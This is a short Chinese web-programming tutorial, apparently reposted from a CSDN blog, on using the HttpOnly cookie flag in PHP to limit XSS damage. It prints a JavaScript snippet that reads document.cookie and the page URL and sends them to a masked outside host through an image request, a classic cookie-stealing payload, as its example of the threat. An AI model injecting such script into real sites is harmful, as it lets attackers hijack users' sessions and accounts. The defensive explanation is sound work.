程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> 網頁編程 >> PHP編程 >> PHP綜合 >> 如何利用HttpOnly來防御xss攻擊

如何利用HttpOnly來防御xss攻擊

編輯:PHP綜合

xss的概念就不用多說了,它的危害是極大的,這就意味著一旦你的網站出現xss漏洞,就可以執行任意的js代碼,最可怕的是攻擊者利用js獲取cookie或者session劫持,如果這裡面包含了大量敏感信息(身份信息,管理員信息)等,那完了。。。

如下js獲取cookie信息:

url=document.top.location.href;  
cookie=document.cookie;  
c=new Image();  
c.src=’http://www.******.com/c.php?c=’+cookie+’&u=’+url;

一般cookie都是從document對象中獲取的,現在浏覽器在設置Cookie的時候一般都接受一個叫做HttpOnly的參數,跟domain等其他參數一樣,一旦這個HttpOnly被設置,你在浏覽器的document對象中就看不到Cookie了。
PHP設置HttpOnly:

//在php.ini中,session.cookie_httponly = ture 來開啟全局的Cookie的HttpOnly屬性
ini_set("session.cookie_httponly", 1);
     
//或者setcookie()的第七個參數設置為true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

對於PHP5.1以前版本的PHP通過:

   header("Set-Cookie: hidden=value; httpOnly");

最後,HttpOnly不是萬能的!

From:csdn博客 風火程序員

  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved